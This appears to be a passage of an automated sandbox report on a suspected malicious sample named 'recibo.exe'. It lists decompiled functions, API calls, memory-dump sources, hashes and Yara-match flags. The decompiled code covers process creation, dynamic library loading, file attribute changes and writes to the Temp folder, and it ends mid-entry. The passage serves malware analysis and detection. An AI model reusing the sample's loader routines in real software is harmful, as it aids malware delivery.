                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnableShow
                                                                                  • String ID:
                                                                                  • API String ID: 1136574915-0
                                                                                  • Opcode ID: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
                                                                                  • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                  • Opcode Fuzzy Hash: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
                                                                                  • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                  0x00405b29
                                                                                  0x00405b49
                                                                                  0x00405b51
                                                                                  0x00405b56
                                                                                  0x00000000
                                                                                  0x00405b5c
                                                                                  0x00405b60

                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                  • CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3712363035-0
                                                                                  • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                  • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                                                                  • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                  • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                  0x00406912
                                                                                  0x00406915
                                                                                  0x0040691c
                                                                                  0x00406924
                                                                                  0x00406930
                                                                                  0x00000000
                                                                                  0x00406937
                                                                                  0x00406927
                                                                                  0x0040692e
                                                                                  0x00000000
                                                                                  0x0040693f
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                    • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                    • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                    • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2547128583-0
                                                                                  • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                  • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                  • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                  • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 68%
                                                                                  			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                  0x00406031
                                                                                  0x0040603e
                                                                                  0x00406053
                                                                                  0x00406059

                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate
                                                                                  • String ID:
                                                                                  • API String ID: 415043291-0
                                                                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                  0x0040600d
                                                                                  0x00406013
                                                                                  0x00406018
                                                                                  0x00406021
                                                                                  0x00406021
                                                                                  0x0040602a

                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                  • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                  • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                  0x00405af1
                                                                                  0x00405af9
                                                                                  0x00000000
                                                                                  0x00405aff
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                  • GetLastError.KERNEL32 ref: 00405AFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1375471231-0
                                                                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                  • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                  • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC2FF0 Relevance: 1.7, APIs: 1, Instructions: 195libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 37face338ecd1506397839e1169b48b927123e56932522a29a8d547f959b454e
                                                                                  • Instruction ID: 18319f25aa391684d636c959a0a9dbdafaa2d768530e7df197c29414902ff5d1
                                                                                  • Opcode Fuzzy Hash: 37face338ecd1506397839e1169b48b927123e56932522a29a8d547f959b454e
                                                                                  • Instruction Fuzzy Hash: F7515C76A043999FCF319E28DC547DA7BA2EF55310FA5815DDC899B300D3318E85CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 71542B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 19%
                                                                                  			E71542B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x71545050 != 0 && E71542ADB(_a4) == 0) {
					 *0x71545054 = _t93;
					if( *0x7154504c != 0) {
						_t93 =  *0x7154504c;
					} else {
						E715430C0(E71542AD5(), __ecx);
						 *0x7154504c = _t93;
					}
				}
				_t28 = E71542B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E71542AFD();
					_t72 = _a4;
					_t79 =  *0x71545058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x71545058 = _t72;
					E71542AF7();
					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
					 *0x71545034 = _t33;
					 *0x71545038 = _t79;
					if( *0x71545050 != 0 && E71542ADB( *0x71545058) == 0) {
						 *0x7154504c = _t94;
						_t94 =  *0x71545054;
					}
					_t80 =  *0x71545058;
					_a4 = _t80;
					 *0x71545058 =  *((intOrPtr*)(E71542AFD() + _t80));
					_t37 = E71542AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E71542B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E71542B14() + _a4 + _v8);
							_push(E71542B1E());
							if( *0x71545050 <= 0 || E71542ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7154504c =  *0x7154504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x71545058;
					if( *0x71545058 == 0) {
						 *0x7154504c = 0;
					}
					E71542B42(_t107, _a4,  *0x71545034,  *0x71545038);
					return _a4;
				}
				_push(E71542B14() + _a4);
				_t56 = E71542B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E71542B26();
				_t87 = E71542B22();
				_t90 = E71542B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                  0x71542ba8
                                                                                  0x71542bb9
                                                                                  0x71542bc6
                                                                                  0x71542bda
                                                                                  0x71542bc8
                                                                                  0x71542bcd
                                                                                  0x71542bd2
                                                                                  0x71542bd2
                                                                                  0x71542bc6
                                                                                  0x71542be3
                                                                                  0x71542be8
                                                                                  0x71542bee
                                                                                  0x71542c32
                                                                                  0x71542c32
                                                                                  0x71542c37
                                                                                  0x71542c3c
                                                                                  0x71542c42
                                                                                  0x71542c44
                                                                                  0x71542c4a
                                                                                  0x71542c57
                                                                                  0x71542c59
                                                                                  0x71542c5e
                                                                                  0x71542c6b
                                                                                  0x71542c7e
                                                                                  0x71542c84
                                                                                  0x71542c8a
                                                                                  0x71542c8b
                                                                                  0x71542c91
                                                                                  0x71542c9d
                                                                                  0x71542ca3
                                                                                  0x71542cab
                                                                                  0x71542cac
                                                                                  0x71542caf
                                                                                  0x71542cba
                                                                                  0x71542cbc
                                                                                  0x71542cc8
                                                                                  0x71542cce
                                                                                  0x71542cd6
                                                                                  0x71542d02
                                                                                  0x71542d03
                                                                                  0x71542d05
                                                                                  0x71542d09
                                                                                  0x71542d09
                                                                                  0x71542d10
                                                                                  0x71542ce6
                                                                                  0x71542ce6
                                                                                  0x71542ce7
                                                                                  0x71542cf5
                                                                                  0x71542cfe
                                                                                  0x71542cfe
                                                                                  0x71542cd6
                                                                                  0x71542cba
                                                                                  0x71542d12
                                                                                  0x71542d19
                                                                                  0x71542d1b
                                                                                  0x71542d1b
                                                                                  0x71542d34
                                                                                  0x71542d42
                                                                                  0x71542d42
                                                                                  0x71542bf9
                                                                                  0x71542bfa
                                                                                  0x71542bff
                                                                                  0x71542c03
                                                                                  0x71542c08
                                                                                  0x71542c1c
                                                                                  0x71542c1d
                                                                                  0x71542c1e
                                                                                  0x71542c20
                                                                                  0x71542c25
                                                                                  0x71542c27
                                                                                  0x71542c27
                                                                                  0x71542c2a
                                                                                  0x71542c30
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(00000000), ref: 71542C57
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: cb0ad8b792a502ae9893d8d686dbd6a1e5e1c85eecfc0a4bbe610fccb0b2fab5
                                                                                  • Instruction ID: 6c630356ae003f7ba292b9858b7adb89b5c5ecd9d4d4a0612357b07e0d7e32b8
                                                                                  • Opcode Fuzzy Hash: cb0ad8b792a502ae9893d8d686dbd6a1e5e1c85eecfc0a4bbe610fccb0b2fab5
                                                                                  • Instruction Fuzzy Hash: F7410276918229EFDB2EDFA6F880B5D37B4EB84354F319826ED09C7100CA389485DBD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC37F4 Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 19088090fb3a2902f090ea455ec16274e27d1372d1dded36d83efa177560aeaa
                                                                                  • Instruction ID: beeb854c8506f7a68c7d6953c679a6ba48686b2ca777ea71259aa73e420f4c2b
                                                                                  • Opcode Fuzzy Hash: 19088090fb3a2902f090ea455ec16274e27d1372d1dded36d83efa177560aeaa
                                                                                  • Instruction Fuzzy Hash: 65418B71A493C99BDF329E389CA53DA3BA25F66210FAC809ECCC98B202D3314745C761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB36E4 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 935be49347ca6176df46040b7f56174dc148eef8efb261aeef4fd38cc13824cc
                                                                                  • Instruction ID: 94e24846da0597d166d06eee8410aa1209e2d1208dad187a3e45cb6d7f9b35bf
                                                                                  • Opcode Fuzzy Hash: 935be49347ca6176df46040b7f56174dc148eef8efb261aeef4fd38cc13824cc
                                                                                  • Instruction Fuzzy Hash: 8F11AAEE9045C807C72B4439C5262D06F91EF8E324F180DCBDE48DFBA5C622CA478751
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC34F4 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: b201d74623750afd21ebaf4adc862907ca40abb3fff01d0cc2c5364385ce810c
                                                                                  • Instruction ID: 3294b86cc47b795fedbf1c5e32618ac5ba65059f54e93f5e25e018ac082cd4d2
                                                                                  • Opcode Fuzzy Hash: b201d74623750afd21ebaf4adc862907ca40abb3fff01d0cc2c5364385ce810c
                                                                                  • Instruction Fuzzy Hash: 06114C74A00299DFCB35AE349D683DE37A5AF1A350F94806EEC4CCB300E3718B449B50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 70%
                                                                                  			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402DA6(0xffffffd0);
				_t16 = E00402DA6(0xffffffdf);
				E00402DA6(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E00406873(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E004062FD(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                                                  0x00401684
                                                                                  0x0040168d
                                                                                  0x0040168f
                                                                                  0x00401696
                                                                                  0x0040169e
                                                                                  0x004016aa
                                                                                  0x0040292e
                                                                                  0x004016be
                                                                                  0x004016c0
                                                                                  0x004016c5
                                                                                  0x00000000
                                                                                  0x004016c5
                                                                                  0x004016a0
                                                                                  0x004016a0
                                                                                  0x004022f1
                                                                                  0x004022f1
                                                                                  0x004022f1
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMove
                                                                                  • String ID:
